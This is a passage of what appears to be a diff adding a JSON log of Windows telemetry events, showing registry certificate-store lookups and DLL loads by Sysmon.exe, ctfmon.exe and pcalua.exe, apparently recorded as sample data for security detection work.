"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + 
}, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + 
"timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573974330000, + 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573974330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974330000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "uxtheme.dll", + "image_path": "C:\\Windows\\System32\\uxtheme.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974330000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "msctf.dll", + "image_path": "C:\\Windows\\System32\\msctf.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974330000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "dwmapi.dll", + "image_path": "C:\\Windows\\System32\\dwmapi.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974330000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM", + 
"registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883573974480000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883573974480000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", + "registry_value": "Input", + "timestamp": 131883573974480000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "image_load", + "image_name": "TextInputFramework.dll", + "image_path": "C:\\Windows\\System32\\TextInputFramework.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974480000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "CoreUIComponents.dll", + "image_path": "C:\\Windows\\System32\\CoreUIComponents.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974480000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "CoreMessaging.dll", + "image_path": "C:\\Windows\\System32\\CoreMessaging.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974480000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "WinTypes.dll", + "image_path": 
"C:\\Windows\\System32\\WinTypes.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974480000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "ntmarta.dll", + "image_path": "C:\\Windows\\System32\\ntmarta.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974480000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\System32\\ole32.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974480000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "propsys.dll", + "image_path": "C:\\Windows\\System32\\propsys.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974480000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883573974640000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust 
Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573974640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "clbcatq.dll", + "image_path": "C:\\Windows\\System32\\clbcatq.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974640000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "OneCoreUAPCommonProxyStub.dll", + "image_path": "C:\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974640000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", + "registry_value": "NameSpace", + "timestamp": 131883573974640000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", + "registry_value": "NameSpace", + "timestamp": 131883573974640000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "dui70.dll", + "image_path": "C:\\Windows\\System32\\dui70.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974330000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": 
"C:\\WINDOWS\\system32\\pcalua.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace\\DelegateFolders", + "registry_value": "DelegateFolders", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974790000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573974790000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + 
